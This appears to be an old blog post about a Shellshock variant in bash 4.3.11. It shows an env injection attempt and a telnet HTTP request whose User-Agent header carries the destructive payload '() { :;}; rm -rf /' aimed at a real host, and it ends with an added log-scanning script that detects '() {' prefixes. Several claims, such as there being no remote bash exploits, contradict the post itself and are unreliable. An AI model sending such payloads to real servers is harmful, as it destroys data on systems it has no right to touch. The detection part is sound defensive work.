Posted: . At: 5:15 PM. This was 10 years ago. Post ID: 7780

A variant of the shellshock bug that still works with the bash 4.3.11 shell.

This is a variant of the shellshock bug for bash that still works on a patched system. I am using Ubuntu 14.04 and this still works for me.

env VAR1='me() {echo "hello"}\ ' /bin/touch /home/$LOGNAME/my.text

So you can still put arbitrary content after the function definition in a bash script. I have installed the latest bash updates and this still works, so bash has quite a way to go before it is fully secure. It is better to use another shell; I used the /bin/dash shell as a replacement for my default bash shell on Ubuntu. There is also this method, using telnet, that uses environment variables to inject malicious code into a CGI script running on an Apache2 website:

telnet google.com 80    [14-09-27 23:07:14]
Trying 2607:f8b0:4005:800::1007...
Trying 74.125.239.104...
Connected to google.com.
Escape character is '^]'.
HTTP/1.1 GET /
Host: google.com
User-Agent: () { :;}; rm -rf /
Accept: */*

This vulnerability must be fixed, but how do you create a regex that can check every possible permutation of malicious code inserted after a bash function? I recommend using csh or ksh instead of bash. There are no “remote” exploits for the Linux bash shell. Bash does not have network connectivity. The only way that this could actually be exploited is if the remote server has an SSH service running that is forwarded to the Internet. There may be remote code execution vulnerabilities when bash is used in connection with a network service like a web server. CGI scripts could be vulnerable to this attack. But patching your system should be of the utmost concern when dealing with this problem. That is the best way to keep your Internet-connected systems protected from attack. That and a good firewall.
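
On the regex question above: a log check does not need to match the injected code itself, because a value like the User-Agent header shown earlier can be recognised by the `() {` prefix it starts with. The following shell script is an added example, not code from the original post; it assumes Apache's "combined" log format, the function names (`sample_log`, `scan_log`, `count_hits`) are hypothetical, and the log lines are constructed samples.

```shell
#!/bin/sh
# Added example: flag logged request fields that begin with the bash
# function-definition marker "() {".
# Assumption: Apache "combined" log format, so splitting a line on double
# quotes gives $2 = request line, $4 = Referer, $6 = User-Agent.

# Constructed sample log lines (documentation IP ranges, harmless payloads).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [27/Sep/2014:23:07:14 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [27/Sep/2014:23:08:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; echo probe"
198.51.100.8 - - [27/Sep/2014:23:08:30 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "() { ignored; }; echo probe" "curl/7.35.0"
192.0.2.11 - - [27/Sep/2014:23:09:12 +0000] "GET /docs/f() { HTTP/1.1" 404 210 "-" "Wget/1.15"
EOF
}

# scan_log: read combined-format lines on stdin and print "<client> <field>"
# for every quoted field whose first four bytes are "() {".
# The match is anchored to the start of the value, so "() {" appearing in the
# middle of a URL (last sample line) is not reported.
scan_log() {
    awk -F'"' '
        BEGIN { name[2] = "request"; name[4] = "referer"; name[6] = "user-agent" }
        {
            split($1, pre, " ")          # pre[1] is the client address
            for (i = 2; i <= 6; i += 2)
                if (substr($i, 1, 4) == "() {")
                    print pre[1], name[i]
        }'
}

# count_hits: number of flagged fields in the log read from stdin.
count_hits() { scan_log | wc -l | tr -d ' '; }

# Run against the constructed sample when executed directly.
sample_log | scan_log
```

This only sees the fields the server writes to its access log, so headers that are not logged go unchecked, and a logged value containing an escaped double quote will shift the field positions.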
